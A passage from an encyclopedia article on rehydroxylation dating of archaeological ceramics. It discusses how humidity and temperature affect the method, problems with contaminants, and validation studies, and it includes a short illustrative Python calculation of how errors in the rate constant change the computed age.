When developing the method, it was important to understand whether variations in humidity affect the RHX mass gain rate of the ceramic material, as little research had yet examined this in depth. A study was therefore carried out on samples from the 19th and 20th centuries, [ 11 ] in which the samples were dehydrated to remove any physically and chemically bonded water and placed in conditions which were varied between dry and humid extremes. The conclusion was that variations in humidity do not affect the kinetics of RHX, since humidity only affects the physically bonded water content, rather than the chemically bonded hydroxyl ions. [ 11 ] This is because the RHX reaction occurs extremely slowly, and only minute amounts of water are required to feed it, with sufficient water being available in virtually all terrestrial environments. Neither systematic nor transient changes in humidity have an effect on long-term rehydroxylation kinetics. However, they do affect instantaneous gravimetric measurements or introduce systematic error, for example through capillary condensation . [ 11 ]
Changes in temperature can strongly affect the rate of RHX and this may impact the calculated age of the ceramic. To illustrate this, the hypothetical example of a 1000-year-old sample is used. [ 12 ] During the first 500 years, the ambient temperature remains at 10 °C; for the following 500 years, the temperature increases to 15 °C. Therefore, after the first 500 years, the rate of RHX increases. The mass of the material also begins to increase at a faster rate than previously. [ 12 ] Thus, when calculating dates, scientists must be able to estimate the temperature history of the sample. The method of calculation is based on temperature data for the location, with adjustments for burial depth and long-term temperature variation from historical records, [ 12 ] such as seasonal and climatic changes. This information is used to estimate an effective lifetime temperature or ELT which is then used in the dating calculation. [ 5 ] Recognition of the effects of changes in temperature is vital since reheating the material to a high enough temperature causes the ceramic to lose some or all of the water gained since the original firing, thus affecting the age calculated. [ 13 ] For example, a medieval brick examined by Wilson and her colleagues [ 1 ] produced a date of 66 years, instead of the expected earlier date. Closer analysis revealed that the exterior of the brick contained vitrified elements, indicating that it had been exposed to extreme heat since the original time of firing. This was due to the brick having been dehydroxylated by the intense heat of incendiary bombing and fires during World War II . [ 14 ] To avoid this type of error or confirm the calculated date, archaeological methods can be used alongside RHX dating, such as stratigraphic dating , radiocarbon dating or other archaeological methods.
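Because the computed age varies as the fourth power of $1/\alpha$, even a modest error in the rate constant implied by a misestimated ELT is strongly amplified; a small illustrative sketch (all numbers ours, not from the cited studies):

```python
# Sensitivity of the RHX age to an error in alpha (driven by a wrong ELT estimate).
true_age = 1000.0                            # years, illustrative
for ratio in (0.95, 1.00, 1.05, 1.10):       # assumed alpha / true alpha
    estimated = true_age / ratio ** 4        # follows from t = (m/alpha)**4
    print(f"alpha off by x{ratio:.2f}: estimated age = {estimated:6.1f} years")
# a 10% overestimate of alpha shrinks the computed age by roughly a third
```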
The main application of the RHX technique is to date archaeological ceramics. Yet most archaeological material contains components which cause either additional mass gain or additional mass loss during the RHX measurement process. [ 15 ] These components can be an intrinsic part of the object, for example materials added as temper, or compounds which have become incorporated into the object during use, such as organic residues, or other elements which have entered the object during burial or conservation. Removing the contaminants without affecting the RHX technique is currently being researched. The method deemed the most effective of those tested consisted of an acid-base treatment, using hydrochloric acid (HCl) to clean the samples, followed by a solution of hydrogen peroxide (H 2 O 2 ) to oxidise them. [ 16 ] Since RHX dating has yet to become a key part of dating ceramic artefacts due to its very recent development, the residues on the outside/inside of the ceramic can be dated using other methods, including radiocarbon, thermoluminescence (TL) , optically stimulated luminescence (OSL) and electron paramagnetic resonance (EPR) . [ 8 ]
The RHX technique was the product of a three-year study by a collaboration of University of Manchester and University of Edinburgh researchers, led by Moira Wilson. Though it has only been established on bricks and tiles of up to 2,000 years of age, research is continuing to determine whether RHX can be accurately used on any fired-clay material, for example earthenware of up to 10,000 years of age. [ 4 ] This is because the mass gain amounts to only a 1–2% increase over the original mass of the material over the course of a few millennia. The potential capacity for further adsorption of water could extend to 10,000 years, since the kinetic power law on which the method relies remains true over large time scales. [ 1 ] Since the method remains under refinement, it is not yet a standard means of dating archaeological ceramics.
The original work of Wilson and co-workers was undertaken on construction materials, bricks and tiles. Transferring the method to ceramics has brought additional challenges, but initial results have demonstrated that ceramics have the same “internal clock” as bricks. [ 17 ] Several other studies have attempted to replicate the RHX technique, [ 13 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] but using archaeological ceramics. These studies have encountered issues with components within the ceramics, including the mineralogy or the temper added to the clay, causing either additional mass gain or additional mass loss during the RHX measurement process. The quality of data generated by the Manchester and Edinburgh groups has been due to analysing fired-clay materials which do not contain these components. Efforts to successfully replicate the original work and overcome the challenges presented by archaeological ceramics are underway in several academic institutions worldwide.
One example of this research is a study from 2011 that was conducted on sherds of 19th-century Davenport ceramics excavated in Utah , United States, to assess the validity of the original method, specifically the rate equation. The study confirmed that RHX dating is applicable to archaeological ceramics, with Bowen and his colleagues stating "the development of a refined expression for rehydration/RHX behaviour would allow a dramatic enhancement of the anthropological research questions currently being posed". [ 22 ] In spite of the success, they stressed that knowledge of the mineralogy of the sample is vital. [ 22 ] They noted that some minerals, such as illite , undergo dehydration and dehydroxylation reversibly; others, such as kaolinite , undergo this at varying temperatures since they vitrify. Therefore, in order to dehydrate the sample effectively, a suitable temperature needs to be chosen to avoid compromising the integrity of the sample components. It was also concluded that more research needed to be carried out to further examine the effects of mineralogy on RHX dating. [ 22 ]
A more recent analysis from 2017 on potsherds from southern Apulia , Italy, proved the potential for the RHX method to become a reliable "alternative or ancillary" [ 21 ] means of dating ceramics. The samples used were fragments of Byzantine pottery which had been dated previously by association with other artefacts using radiocarbon analysis. Meanwhile, it was noted that since RHX dating has not been tested sufficiently, it cannot yet replace more conventional ways of dating pottery, such as radiocarbon, which has extensive proof of its accuracy. The ages calculated for the Byzantine sherds through RHX dating were consistent with the known ones. The study also emphasised the possible value of this method in refining chronological pottery seriation in cases where the pottery style remains similar over extended periods of time in a specific region, such as the Byzantine vessels examined. [ 21 ]
Overall, the RHX dating technique shows great potential within the field of Archaeology and research continues to allow for its use in more general studies. | https://en.wikipedia.org/wiki/Rehydroxylation_dating |